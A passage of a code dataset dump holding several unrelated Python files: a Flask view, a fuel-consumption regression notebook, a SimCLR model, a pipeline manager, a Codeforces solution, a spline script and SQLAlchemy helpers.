user.id).paginate(p, constants.USER_COLLECTION_MAX_NEWS, False)\n # 获取当前页数据\n news_li = paginate.items\n # 获取当前页\n current_page = paginate.page\n # 获取总页数\n total_page = paginate.pages\n except Exception as e:\n current_app.logger.error(e)\n\n news_dict_li = []\n\n for news_item in news_li:\n news_dict_li.append(news_item.to_review_dict())\n\n data = {\"news_list\": news_dict_li, \"total_page\": total_page, \"current_page\": current_page}\n return render_template('profile/user_news_list.html', data=data)","sub_path":"info/moduls/profile/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"216080959","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[49]:\n\n\nimport numpy as np\nimport pandas as pd\nimport pylab as pl\nimport matplotlib.pyplot as plt\nget_ipython().run_line_magic('matplotlib', 'inline')\n\n\n# In[50]:\n\n\ndf=pd.read_csv('F://FuelConsumptionCo2.csv')\ndf.head()\n\n\n# In[51]:\n\n\ndf.drop(['MODELYEAR','MAKE','MODEL','VEHICLECLASS','TRANSMISSION','FUELTYPE'],inplace=True,axis=1)\ndf.head()\n\n\n# In[52]:\n\n\ndf.drop(['FUELCONSUMPTION_COMB_MPG','CYLINDERS'],axis=1,inplace=True)\ndf.head()\n\n\n# In[53]:\n\n\nX=df.drop('CO2EMISSIONS',axis=1)\nY=df['CO2EMISSIONS']\nprint(X)\nprint(Y)\n\n\n# In[54]:\n\n\nplt.figure(figsize=(30,20))\nplt.plot(X,Y,'bo')\nplt.show()\n\n\n# # LINEAR REGRESSION USING SCIKIT LEARN \n# ## HERE INDEPENDENT VARIABLE IS FUELCONSUMPTION_CITY\n\n# In[55]:\n\n\nplt.figure(figsize=(20,10))\nplt.plot(X['FUELCONSUMPTION_CITY'],Y,'bo')\nplt.show()\n\n\n# In[56]:\n\n\nX_city=df['FUELCONSUMPTION_CITY'].values\n\n\n# In[57]:\n\n\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.model_selection import train_test_split\n\n\n# ## TRAIN OUR ALGO\n\n# In[58]:\n\n\nX_traincity,X_testcity,Y_traincity,Y_testcity=train_test_split(X_city,Y,test_size=0.2, random_state=4)\nX_traincity=X_traincity.reshape(len(X_traincity),1)\nlog=LinearRegression()\nlog=log.fit(X_traincity,Y_traincity)\nY_pred_traincity=log.predict(X_traincity)\nrmse=np.sqrt(mean_squared_error(Y_traincity,Y_pred_traincity))\nprint(rmse)\nprint(log.score(X_traincity,Y_traincity))\n\n\n# In[59]:\n\n\nplt.figure(figsize=(20,10))\nplt.plot(X_traincity,Y_traincity,'bo')\nplt.plot(X_traincity,Y_pred_traincity,'r')\nplt.legend()\nplt.show()\n\n\n# ## TESTING OUR ALGO\n\n# In[60]:\n\n\nX_testcity=X_testcity.reshape(len(X_testcity),1)\nY_testpred=log.predict(X_testcity)\nprint(np.sqrt(mean_squared_error(Y_testcity,Y_testpred)))\nplt.figure(figsize=(20,10))\nplt.plot(X_testcity,Y_testcity,'bo',label='points')\nplt.plot(X_testcity,Y_testpred,'r',label='regression line')\nplt.show()\n\n\n# ## EQUATION OF ABOVE REGRESSION LINE\n\n# In[61]:\n\n\nm=log.coef_\nc=log.intercept_\nprint(m,c)\nx_city=11.2\ny_city=m*x_city+c\nprint(y_city)\n\n\n# # LINEAR REGRESSION USING SCIKIT LEARN\n# ## HERE INDEPENDENT VARIABLE IS FUELCONSUMPTION_HWY\n# \n\n# In[62]:\n\n\nX1=df['FUELCONSUMPTION_HWY'].values\n\n\n# In[63]:\n\n\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.model_selection import train_test_split\n\n\n# In[64]:\n\n\nX1_trainhwy,X1_testhwy,Y_trainhwy,Y_testhwy=train_test_split(X1,Y,test_size=0.2,random_state=4)\nX1_trainhwy=X1_trainhwy.reshape(len(X1_trainhwy),1)\nlog=LinearRegression()\n\n\n# In[65]:\n\n\nlog=log.fit(X1_trainhwy,Y_trainhwy)\nY_trainhwypred=log.predict(X1_trainhwy)\nprint(log.score(X1_trainhwy,Y_trainhwy))\n\n\n# In[66]:\n\n\nplt.figure(figsize=(20,10))\nplt.plot(X1_trainhwy,Y_trainhwy,'bo')\nplt.plot(X1_trainhwy,Y_trainhwypred,'r')\nplt.legend()\nplt.show()\n\n\n# ### training error\n\n# In[67]:\n\n\nrmse=np.sqrt(mean_squared_error(Y_trainhwy,Y_trainhwypred))\nprint(rmse)\nprint(log.score(X1_trainhwy,Y_trainhwy))\n\n\n# In[68]:\n\n\nX1_testhwy=X1_testhwy.reshape(len(X1_testhwy),1)\nY_testhwypred=log.predict(X1_testhwy)\nplt.figure(figsize=(20,10))\nplt.plot(X1_testhwy,Y_testhwy,'bo')\nplt.plot(X1_testhwy,Y_testhwypred,'r')\nplt.legend()\nplt.show()\n\n\n# ### test error\n\n# In[69]:\n\n\nrmse=np.sqrt(mean_squared_error(Y_testhwy,Y_testhwypred))\nprint(rmse)\nprint(log.score(X1_testhwy,Y_testhwy))\n\n\n# In[70]:\n\n\nm1=log.coef_\nc1=log.intercept_\nx1=6.7\ny1=m1*x1+c1\nprint(y1)\n\n\n# # LINEAR REGRESSION USING SCIKIT LEARN \n# ## HERE INDEPENDENT VARIABLE IS FUELCONSUMPTION_Comb\n\n# In[71]:\n\n\nX2=df['FUELCONSUMPTION_COMB'].values\n\n\n# In[72]:\n\n\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.model_selection import train_test_split\n\n\n# In[73]:\n\n\nX2_train_comb,X2_test_comb,Y_train_comb,Y_test_comb=train_test_split(X2,Y,test_size=0.2,random_state=4)\nX2_train_comb=X2_train_comb.reshape(len(X2_train_comb),1)\nlog=LinearRegression()\nlog=log.fit(X2_train_comb,Y_train_comb)\nY_train_combpred=log.predict(X2_train_comb)\nprint(log.score(X2_train_comb,Y_train_comb))\n\n\n# In[74]:\n\n\nplt.figure(figsize=(20,10))\nplt.plot(X2_train_comb,Y_train_comb,'bo')\nplt.plot(X2_train_comb,Y_train_combpred,'r')\nplt.legend()\nplt.show()\n\n\n# In[75]:\n\n\nX2_test_comb=X2_test_comb.reshape(len(X2_test_comb),1)\nY_test_comb_pred=log.predict(X2_test_comb)\nprint(log.score(X2_test_comb,Y_test_comb))\n\n\n# In[76]:\n\n\nplt.figure(figsize=(20,10))\nplt.plot(X2_test_comb,Y_test_comb,'bo')\nplt.plot(X2_test_comb,Y_test_comb_pred,'r')\nplt.legend()\nplt.show()\n\n\n# In[77]:\n\n\nm2=log.coef_\nc2=log.intercept_\nx2=8.5\ny2=m2*x2+c2\nprint(y2)\n\n\n# # POLYNOMIAL REGRESSION\n# \n\n# In[128]:\n\n\nX=df[['ENGINESIZE', 'FUELCONSUMPTION_CITY' ,'FUELCONSUMPTION_HWY','FUELCONSUMPTION_COMB']].values\nprint(X[:,3:])\n\n\n# In[133]:\n\n\n\n#X=X.reshape(len(X),1)\nlog=LinearRegression()\nlog=log.fit(X,Y)\nY_pred=log.predict(X)\nprint(np.sqrt(mean_squared_error(Y,Y_pred)))\nprint(log.score(X,Y))\n\n\n# In[134]:\n\n\nplt.figure(figsize=(20,10))\ny=log.intercept_+log.coef_[0]*X[:,:1]+log.coef_[1]*X[:,1:2]+log.coef_[2]*X[:,2:3]+log.coef_[3]*X[:,3:]\nplt.plot(X,Y,'bo')\nplt.plot(X,y,'r')\nplt.show()\n\n\n# In[135]:\n\n\nprint(log.coef_)\nprint(log.intercept_)\n\n\n# ## equation of polynomial regression\n\n# In[86]:\n\n\nm1=log.coef_[0]\nm2=log.coef_[1]\nm3=log.coef_[2]\nm4=log.coef_[3]\nc=log.intercept_\nx1=2\nx2=9.9\nx3=6.7\nx4=8.5\n\ny=m1*x1+m2*x2+m3*x3+m4*x4+c\nprint(y)\n\n\n# # POLYNOMIAL REGRESSION WITH ONLY ONE FEATURE\n# ## very important to understand\n\n# In[96]:\n\n\nX_engine=df['ENGINESIZE'].values\nX_engine=X_engine.reshape(len(X_engine),1)\n\n\n# In[97]:\n\n\nfrom sklearn.preprocessing import PolynomialFeatures\n\n\n# In[98]:\n\n\npoly=PolynomialFeatures(degree=2)\nX_engine_poly=poly.fit_transform(X_engine)\nX_engine_poly\n\n\n# In[103]:\n\n\nlog=log.fit(X_engine_poly,Y)\nY_pred=log.predict(X_engine_poly)\n\n\n# In[104]:\n\n\nprint(log.score(X_engine_poly,Y))\n\n\n# In[105]:\n\n\nprint(log.coef_)\nprint(log.intercept_)\n\n\n# In[109]:\n\n\nxx=np.arange(0.0,10.0,0.1)\ny=log.coef_[1]*xx+log.coef_[2]*np.power(xx,2)+log.intercept_\nplt.figure(figsize=(20,10))\nplt.plot(X_engine,Y,'bo')\nplt.plot(xx,y,'r')\nplt.show()\n\n\n# In[110]:\n\n\nX_city=df['FUELCONSUMPTION_CITY'].values\nX_city=X_city.reshape(len(X_city),1)\n\n\n# In[111]:\n\n\nfrom sklearn.preprocessing import PolynomialFeatures\n\n\n# In[112]:\n\n\npoly=PolynomialFeatures(degree=2)\nX_city_poly=poly.fit_transform(X_city)\nlog=log.fit(X_city_poly,Y)\nY_city_pred=log.predict(X_city_poly)\nprint(log.score(X_city_poly,Y))\n\n\n# In[114]:\n\n\nxx=np.arange(4.0,40.0,0.1)\ny=log.coef_[1]*xx+log.coef_[2]*np.power(xx,2)+log.intercept_\nplt.figure(figsize=(20,10))\nplt.plot(X_city,Y,'bo')\nplt.plot(xx,y,'r')\nplt.show()\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"Fuelconsumption_CO2.py","file_name":"Fuelconsumption_CO2.py","file_ext":"py","file_size_in_byte":6647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"158223168","text":"import os\n\nimport torch\nimport torch.nn as nn\nimport torchvision.models as models\n\n####################################################\nout_channel = {'alexnet': 256, 'vgg16': 512, 'vgg19': 512, 'vgg16_bn': 512, 'vgg19_bn': 512,\n 'resnet18': 512, 'resnet34': 512, 'resnet50': 2048, 'resnext50_32x4d': 2048,\n 'resnext101_32x8d': 2048, 'mobilenet_v2': 1280, 'mobilenet_v3_small': 576,\n 'mobilenet_v3_large': 960 ,'mnasnet1_3': 1280, 'shufflenet_v2_x1_5': 1024,\n 'squeezenet1_1': 512, 'efficientnet-b0': 1280, 'efficientnet-l2': 5504,\n 'efficientnet-b1': 1280, 'efficientnet-b2': 1408, 'efficientnet-b3': 1536,\n 'efficientnet-b4': 1792, 'efficientnet-b5': 2048, 'efficientnet-b6': 2304,\n 'efficientnet-b7': 2560, 'efficientnet-b8': 2816}\n\nfeature_map = {'alexnet': -2, 'vgg16': -2, 'vgg19': -2, 'vgg16_bn': -2, 'vgg19_bn': -2,\n 'resnet18': -2, 'resnet34': -2, 'resnet50': -2, 'resnext50_32x4d': -2,\n 'resnext101_32x8d': -2, 'mobilenet_v2': 0, 'mobilenet_v3_large': -2,\n 'mobilenet_v3_small': -2, 'mnasnet1_3': 0, 'shufflenet_v2_x1_5': -1,\n 'squeezenet1_1': 0}\n\n####################################################\nclass SimCLRModel(nn.Module):\n\n def __init__(self, base_encoder, dim=128, pretrained=False):\n super(SimCLRModel, self).__init__()\n\n model = getattr(models, base_encoder)\n model = model(pretrained=pretrained)\n\n self.feature_extract = nn.Sequential(*list(model.children())[0]) if feature_map[base_encoder]==0 \\\n else nn.Sequential(*list(model.children())[:feature_map[base_encoder]])\n\n pool = nn.AdaptiveAvgPool2d(1)\n layers = [pool, nn.Flatten()]\n # projection MLP\n num_ftrs = out_channel[base_encoder]\n layers += [nn.Linear(num_ftrs, num_ftrs), nn.ReLU()]\n layers += [nn.Linear(num_ftrs, dim)]\n self.later_embedding = nn.Sequential(*layers)\n\n\n def forward(self, x):\n h = self.feature_extract(x)\n z = self.later_embedding(h)\n return h, z\n\n# modified from https://github.com/stanfordmlgroup/MoCo-CXR/blob/main/moco_pretraining/moco/moco/builder.py\n# class SimCLRModel(nn.Module):\n#\n# def __init__(self, base_encoder, dim=128, mlp=True, pretrained=False):\n# super(SimCLRModel, self).__init__()\n#\n# if pretrained:\n# model = getattr(models, base_encoder)\n# self.encoder = model(pretrained=True)\n# if self.encoder.__class__.__name__.lower() == 'resnet':\n# num_ftrs = self.encoder.fc.in_features\n# self.encoder.fc = nn.Linear(num_ftrs, dim)\n# elif self.encoder.__class__.__name__.lower() == 'vgg':\n# num_ftrs = self.encoder.classifier._modules['6'].in_features\n# self.encoder.classifier = nn.Linear(num_ftrs, dim)\n# elif self.encoder.__class__.__name__.lower() == 'mnasnet':\n# num_ftrs = self.encoder.classifier[1].in_features\n# self.encoder.classifier = nn.Linear(num_ftrs, dim)\n# elif self.encoder.__class__.__name__.lower() == 'densenet':\n# num_ftrs = self.encoder.classifier.in_features\n# self.encoder.classifier = nn.Linear(num_ftrs, dim)\n#\n# else:\n# model = getattr(models, base_encoder)\n# self.encoder = model(num_classes=dim)\n#\n# if mlp:\n# if self.encoder.__class__.__name__.lower() == 'resnet':\n# dim_mlp = self.encoder.fc.weight.shape[1]\n# self.encoder.fc = nn.Sequential(nn.Linear(dim_mlp, dim_mlp), nn.ReLU(), self.encoder.fc)\n# elif self.encoder.__class__.__name__.lower() == 'vgg':\n# dim_mlp = self.encoder.classifier._modules['0'].weight.shape[1]\n# print(dim_mlp)\n# self.encoder.classifier = nn.Sequential(nn.Linear(dim_mlp, dim_mlp), nn.ReLU(), self.encoder.classifier)\n# elif self.encoder.__class__.__name__.lower() == 'mnasnet':\n# dim_mlp = self.encoder.classifier[1].weight.shape[1]\n# self.encoder.classifier = nn.Sequential(nn.Linear(dim_mlp, dim_mlp), nn.ReLU(), self.encoder.classifier)\n# elif self.encoder.__class__.__name__.lower() == 'densenet':\n# dim_mlp = self.encoder.classifier.weight.shape[1]\n# self.encoder.classifier = nn.Sequential(nn.Linear(dim_mlp, dim_mlp), nn.ReLU(), self.encoder.classifier)\n#\n# def forward(self, x):\n# return self.encoder(x)\n\nif __name__ == \"__main__\":\n model = SimCLRModel(\"vgg19\", 128)\n print(model)\n # model = getattr(models, \"vgg19\")\n # model = model(pretrained=False)\n # print(model)\n","sub_path":"models/simclr_model.py","file_name":"simclr_model.py","file_ext":"py","file_size_in_byte":4820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"422673367","text":"import re\nimport importlib.util\nfrom pipert.core.component import BaseComponent\nfrom pipert.core.errors import QueueDoesNotExist\nfrom pipert.core.metrics_collector import NullCollector\nfrom pipert.core.routine import Routine\nfrom os import listdir\nfrom os.path import isfile, join\nfrom jsonschema import validate, ValidationError\nimport functools\n\n\n# import gc\n\ndef component_name_existence_error(need_to_be_exist):\n def decorator(func):\n @functools.wraps(func)\n def function_wrapper(self, *args, **kwargs):\n if not (self._does_component_exist(\n kwargs['component_name']) == need_to_be_exist):\n error_word = \"doesn't\" if need_to_be_exist else 'already'\n return self._create_response(\n False,\n f\"Component named {kwargs['component_name']} {error_word} exist\"\n )\n return func(self, *args, **kwargs)\n\n return function_wrapper\n\n return decorator\n\n\nclass PipelineManager:\n\n def __init__(self):\n \"\"\"\n Args:\n \"\"\"\n super().__init__()\n self.components = {}\n self.ROUTINES_FOLDER_PATH = \"pipert/contrib/routines\"\n self.COMPONENTS_FOLDER_PATH = \"pipert/contrib/components\"\n\n @component_name_existence_error(need_to_be_exist=False)\n def create_component(self, component_name, use_shared_memory=False, metrics_collector=NullCollector()):\n self.components[component_name] = \\\n BaseComponent(name=component_name, use_memory=use_shared_memory, metrics_collector=metrics_collector)\n return self._create_response(\n True,\n f\"Component {component_name} has been created\"\n )\n\n @component_name_existence_error(need_to_be_exist=False)\n def create_premade_component(self, component_name,\n component_type_name,\n use_shared_memory=False,\n metrics_collector=NullCollector()):\n component_class = \\\n self._get_component_class_object_by_type_name(component_type_name)\n if component_class is None:\n return self._create_response(\n False,\n f\"The component type {component_type_name} doesn't exist\"\n )\n self.components[component_name] = \\\n component_class(name=component_name, use_memory=use_shared_memory, metrics_collector=metrics_collector)\n return self._create_response(\n True,\n f\"Component {component_name} has been created\"\n )\n\n @component_name_existence_error(need_to_be_exist=True)\n def remove_component(self, component_name):\n if self._does_component_running(self.components[component_name]):\n self.components[component_name].stop_run()\n del self.components[component_name]\n return self._create_response(\n True,\n f\"Component {component_name} has been removed\"\n )\n\n @component_name_existence_error(need_to_be_exist=True)\n def add_routine_to_component(self, component_name,\n routine_type_name, **routine_parameters_kwargs):\n if self._does_component_running(self.components[component_name]):\n return self._create_response(\n False,\n \"You can't add a routine while your component is running\"\n )\n\n routine_class_object = self._get_routine_class_object_by_type_name(routine_type_name)\n\n if routine_class_object is None:\n return self._create_response(\n False,\n f\"The routine type '{routine_type_name}' doesn't exist\"\n )\n\n if \"name\" not in routine_parameters_kwargs:\n return self._create_response(\n False,\n \"Routine must have a name\"\n )\n\n if self.components[component_name] \\\n .does_routine_name_exist(routine_parameters_kwargs[\"name\"]):\n return self._create_response(\n False,\n f\"Routine with the name {routine_parameters_kwargs['name']}\"\n \" already exist in this component\"\n )\n\n try:\n # replace all queue names with the queue objects of the component before creating routine\n for key, value in routine_parameters_kwargs.items():\n if 'queue' in key.lower():\n routine_parameters_kwargs[key] = self.components[component_name] \\\n .get_queue(queue_name=value)\n\n routine_parameters_kwargs[\"component_name\"] = component_name\n\n self.components[component_name] \\\n .register_routine(routine_class_object(**routine_parameters_kwargs)\n .as_thread())\n return self._create_response(\n True,\n f\"The routine {routine_parameters_kwargs['name']} has been added\"\n )\n except QueueDoesNotExist as e:\n return self._create_response(\n False,\n e.message()\n )\n except TypeError as error:\n return self._create_response(\n False,\n str(error)\n )\n\n @component_name_existence_error(need_to_be_exist=True)\n def remove_routine_from_component(self, component_name, routine_name):\n if self._does_component_running(self.components[component_name]):\n return self._create_response(\n False,\n \"You can't remove a routine while your component is running\"\n )\n if self.components[component_name].remove_routine(routine_name):\n return self._create_response(\n True,\n f\"Removed routine with the name {routine_name} from the component\"\n )\n else:\n return self._create_response(\n False,\n f\"There is no routine with the name {routine_name}\"\n f\" inside the component {component_name}\"\n )\n\n @component_name_existence_error(need_to_be_exist=True)\n def create_queue_to_component(self, component_name,\n queue_name, queue_size=1):\n if self.components[component_name].does_queue_exist(queue_name):\n return self._create_response(\n False,\n f\"Queue named {queue_name} already exist\"\n )\n\n self.components[component_name].create_queue(queue_name=queue_name,\n queue_size=queue_size)\n return self._create_response(\n True,\n f\"The Queue {queue_name} has been created\"\n )\n\n @component_name_existence_error(need_to_be_exist=True)\n def remove_queue_from_component(self, component_name, queue_name):\n if not self.components[component_name].does_queue_exist(queue_name):\n return self._create_response(\n False,\n f\"Queue named {queue_name} doesn't exist\"\n )\n\n if self.components[component_name]. \\\n does_routines_use_queue(queue_name):\n return self._create_response(\n False,\n \"Can't remove a queue that is being used by routines\"\n )\n\n self.components[component_name].delete_queue(queue_name=queue_name)\n return self._create_response(\n True,\n f\"The Queue {queue_name} has been removed\"\n )\n\n @component_name_existence_error(need_to_be_exist=True)\n def run_component(self, component_name):\n if self._does_component_running(self.components[component_name]):\n return self._create_response(\n False,\n f\"The component {component_name} already running\"\n )\n else:\n self.components[component_name].run()\n return self._create_response(\n True,\n f\"The component {component_name} is now running\"\n )\n\n @component_name_existence_error(need_to_be_exist=True)\n def stop_component(self, component_name):\n if not self._does_component_running(self.components[component_name]):\n return self._create_response(\n False,\n f\"The component {component_name} is not running running\"\n )\n else:\n if self.components[component_name].stop_run() == 0:\n return self._create_response(\n True,\n f\"The component {component_name} has been stopped\"\n )\n else:\n return self._create_response(\n False,\n \"An error has occurred, can't \"\n f\"stop the component {component_name}\"\n )\n\n def run_all_components(self):\n for component in self.components.values():\n if not self._does_component_running(component):\n component.run()\n return self._create_response(\n True,\n \"All of the components are running\"\n )\n\n def stop_all_components(self):\n for component in self.components.values():\n if self._does_component_running(component):\n component.stop_run()\n return self._create_response(\n True,\n \"All of the components have been stopped\"\n )\n\n def get_all_routine_types(self):\n routine_file_names = [f for f in\n listdir(self.ROUTINES_FOLDER_PATH)\n if isfile(join(self.ROUTINES_FOLDER_PATH, f))]\n\n routine_file_names = [file_name[:-3] for\n file_name in routine_file_names]\n routine_file_names = \\\n [file_name[0].upper() + re.sub(r'_\\w',\n self._remove_string_with_underscore,\n file_name)[1:]\n for file_name in routine_file_names]\n\n routines = []\n for routine_name in routine_file_names:\n current_routine_type = \\\n self._get_routine_class_object_by_type_name(routine_name) \\\n .routine_type.value\n routines.append({\"name\": routine_name,\n \"type\": current_routine_type})\n return routines\n\n @component_name_existence_error(need_to_be_exist=True)\n def change_component_execution_mode(self, component_name, execution_mode):\n try:\n getattr(self.components[component_name], \"as_\" + execution_mode.lower())()\n return self._create_response(\n True,\n f\"The component {component_name} changed execution mode to {execution_mode}\"\n )\n except AttributeError:\n return self._create_response(\n False,\n f\"Cannot find execution mode '{execution_mode}'\"\n )\n\n # helping method for changing the file name to class name\n @staticmethod\n def _remove_string_with_underscore(match):\n return match.group(0).upper()[1]\n\n # helping method for changing the class name to file name\n @staticmethod\n def _add_underscore_before_uppercase(match):\n return '_' + match.group(0).lower()\n\n def get_routine_parameters(self, routine_type_name):\n routine_class_object = self._get_routine_class_object_by_type_name(routine_type_name)\n if routine_class_object is not None:\n return routine_class_object.get_constructor_parameters()\n else:\n return self._create_response(\n False,\n f\"Routine named {routine_type_name} doesn't exist\"\n )\n\n def setup_components(self, components):\n \"\"\"\n vvv Expecting to get vvv\n\n \"components\": {\n \"component_name\": {\n \"queues\": [str],\n \"routines\": {\n \"routine_name\": {\n \"routine_type_name\": str,\n ...(routine params)\n },\n ...(more routines)\n }\n }\n ...(more components)\n }\n \"\"\"\n component_validator = {\n \"type\": \"object\",\n \"properties\": {\n \"queues\": {\"type\": \"array\", \"items\": {\"type\": \"string\"}},\n \"routines\": {\"type\": \"object\"}\n },\n \"required\": [\"queues\", \"routines\"]\n }\n\n # Delete all of the current components\n self.components = {}\n responses = []\n # gc.collect()\n\n if (type(components) is not dict) and (\"components\" not in components):\n return self._create_response(\n False,\n \"All of the components must be inside a dictionary with the key 'components'\"\n )\n\n for component_name, component_parameters in components[\"components\"].items():\n try:\n validate(instance=component_parameters, schema=component_validator)\n to_use_shared_memory = component_parameters.get(\"shared_memory\", False)\n metrics_collector = component_parameters.get(\"metrics_collector\", NullCollector())\n if \"component_type_name\" in component_parameters:\n responses.append(self.create_premade_component(\n component_name=component_name,\n component_type_name=component_parameters[\"component_type_name\"],\n use_shared_memory=to_use_shared_memory,\n metrics_collector=metrics_collector))\n else:\n responses.append(self.create_component(component_name=component_name,\n use_shared_memory=to_use_shared_memory,\n metrics_collector=metrics_collector))\n if \"execution_mode\" in component_parameters:\n responses.append(self.change_component_execution_mode(\n component_name=component_name,\n execution_mode=component_parameters[\"execution_mode\"]))\n for queue in component_parameters[\"queues\"]:\n responses.append(self.create_queue_to_component(\n component_name=component_name,\n queue_name=queue))\n for routine_name, routine_parameters in component_parameters[\"routines\"].items():\n routine_type_name = routine_parameters.pop(\"routine_type_name\", \"\")\n routine_parameters[\"name\"] = routine_name\n responses.append(self.add_routine_to_component(\n component_name=component_name,\n routine_type_name=routine_type_name, **routine_parameters))\n except ValidationError as error:\n responses.append(self._create_response(\n False,\n error.message\n ))\n\n if all(response[\"Succeeded\"] for response in responses):\n return self._create_response(\n True,\n \"All of the components have been created\"\n )\n else:\n return list(filter(lambda response: not response[\"Succeeded\"], responses))\n\n def _get_routine_class_object_by_type_name(self, routine_name: str) -> Routine:\n path = self.ROUTINES_FOLDER_PATH + \"/\" + \\\n re.sub(r'[A-Z]',\n self._add_underscore_before_uppercase,\n routine_name)[1:] + \".py\"\n return self._get_class_object_by_path(path, routine_name)\n\n def _get_component_class_object_by_type_name(self, component_type_name):\n path = self.COMPONENTS_FOLDER_PATH + \"/\" + \\\n re.sub(r'[A-Z]',\n self._add_underscore_before_uppercase,\n component_type_name)[1:] + \".py\"\n return self._get_class_object_by_path(path, component_type_name)\n\n def _get_class_object_by_path(self, path, class_name):\n spec = importlib.util.spec_from_file_location(class_name, path)\n class_object = importlib.util.module_from_spec(spec)\n spec.loader.exec_module(class_object)\n try:\n return getattr(class_object, class_name)\n except AttributeError:\n return None\n\n def _does_component_exist(self, component_name):\n return component_name in self.components\n\n @staticmethod\n def _does_component_running(component):\n return not component.stop_event.is_set()\n\n @staticmethod\n def _create_response(succeeded, message):\n return {\n \"Succeeded\": succeeded,\n \"Message\": message\n }\n\n def get_pipeline_creation(self):\n components = {}\n for component_name in self.components.keys():\n components[component_name] = self._get_component_creation(component_name)\n\n return {\"components\": components}\n\n def _get_component_creation(self, component_name):\n\n component_dict = {\n \"queues\":\n list(self.components[component_name].\n get_all_queue_names()),\n \"routines\": {}\n }\n\n if type(self.components[component_name]).__name__ != BaseComponent.__name__:\n component_dict[\"component_type_name\"] = type(self.components[component_name]).__name__\n for current_routine_object in self.components[component_name]._routines.values():\n routine_creation_object = self._get_routine_creation(\n component_name, current_routine_object)\n routine_name = routine_creation_object.pop(\"name\")\n component_dict[\"routines\"][routine_name] = \\\n routine_creation_object\n\n return component_dict\n\n def _get_routine_creation(self, component_name, routine):\n routine_dict = routine.get_creation_dictionary()\n routine_dict[\"routine_type_name\"] = routine.__class__.__name__\n for routine_param_name in routine_dict.keys():\n if \"queue\" in routine_param_name:\n for queue_name in self.components[component_name].queues.keys():\n if getattr(routine, routine_param_name) is \\\n self.components[component_name].queues[queue_name]:\n routine_dict[routine_param_name] = queue_name\n\n return routine_dict\n","sub_path":"pipert/core/pipeline_manager.py","file_name":"pipeline_manager.py","file_ext":"py","file_size_in_byte":18541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"123841439","text":"import math\nfor _ in range(int(input())):\n l, r = map(int, input().split())\n if r%2 == 0:\n ans = r//2\n else:\n ans = -(r//2 + 1)\n if (l-1)%2 == 0:\n ans-=(l-1)//2\n else:\n ans+= (l-1)//2 +1\n print(ans) ","sub_path":"Codeforces/Codeforces Round #524 (Div. 2) - 1080/1080B-Margarite and the best present.py","file_name":"1080B-Margarite and the best present.py","file_ext":"py","file_size_in_byte":203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"154522760","text":"from scipy.interpolate import UnivariateSpline\n\nbaseImp = [4410000, 4830000, 5250000, 5670000]\nquota = [1165978, 1329190, 1501474, 1682830]\ntipoMarginal = [0.3886, 0.3886, 0.4102, 0.4318]\n\ninterpolacionCuadratica = UnivariateSpline(baseImp, tipoMarginal, k = 2)\ninterpolacionCubica = UnivariateSpline(baseImp, tipoMarginal, k = 3)\n\nbaseEjemplo = 5000000\n\ntipoQuad = interpolacionCuadratica(baseEjemplo)\ntipoCubic = interpolacionCubica(baseEjemplo)\n\nprint(tipoQuad*100, '%')\nprint(tipoCubic*100, '%')\n\nprint(((baseEjemplo-baseImp[2])*tipoQuad)+quota[2])\nprint(((baseEjemplo-baseImp[2])*tipoCubic)+quota[2])","sub_path":"Ejercicio13-Impuesto a la renta/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"399351988","text":"\"\"\"\nCreated on Dec 2, 2011\n\n@author: Administrator\n\"\"\"\n\nfrom flask.ext.sqlalchemy import SQLAlchemy\nimport flask.ext.sqlalchemy as flask_alchemy\nimport sqlalchemy as sa\nimport sqlalchemy.orm as orm\n\n\nclass Database(SQLAlchemy):\n # Until Armin merges the metadata passing feature, we need to subclass\n # this thing.\n def __init__(self, *args, **kwargs):\n self._metadata = kwargs.pop(\"metadata\", sa.MetaData())\n super(Database, self).__init__(*args, **kwargs)\n\n def make_declarative_base(self):\n \"\"\"Creates the declarative base.\"\"\"\n base = flask_alchemy.declarative_base(cls=flask_alchemy.Model, name='Model',\n mapper=flask_alchemy.signalling_mapper,\n metaclass=flask_alchemy._BoundDeclarativeMeta,\n metadata=self._metadata\n )\n base.query = flask_alchemy._QueryProperty(self)\n return base\n\n def create_scoped_session(self, options=None):\n \"\"\"Helper factory method that creates a scoped session.\"\"\"\n return orm.scoped_session(signalling_session_maker(self))\n\n\ndef get_state(app):\n \"\"\"Gets the state for the application\"\"\"\n assert 'sqlalchemy' in app.extensions, \\\n 'The sqlalchemy extension was not registered to the current ' \\\n 'application. Please make sure to call init_app() first.'\n return app.extensions['sqlalchemy']\n\ndef signalling_session_maker(db, autocommit=False, autoflush=False):\n class _SignallingSession(orm.Session):\n\n def __init__(self, **options):\n self.app = db.get_app()\n self._model_changes = {}\n orm.Session.__init__(self, autocommit=autocommit, autoflush=autoflush,\n extension=db.session_extensions,\n bind=db.engine,\n binds=db.get_binds(self.app), **options)\n\n def get_bind(self, mapper, clause=None):\n # mapper is None if someone tries to just get a connection\n if mapper is not None:\n info = getattr(mapper.mapped_table, 'info', {})\n bind_key = info.get('bind_key')\n if bind_key is not None:\n state = get_state(self.app)\n return state.db.get_engine(self.app, bind=bind_key)\n return orm.Session.get_bind(self, mapper, clause)\n return _SignallingSession\n","sub_path":"entityframework/dbutils.py","file_name":"dbutils.py","file_ext":"py","file_size_in_byte":2364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"329926703","text":"from copy import deepcopy\nfrom slm_lab.agent import net\nfrom slm_lab.agent.algorithm.algorithm_util import act_fns, act_update_fns, decay_learning_rate\nfrom slm_lab.agent.algorithm.base import Algorithm\nfrom slm_lab.agent.net import 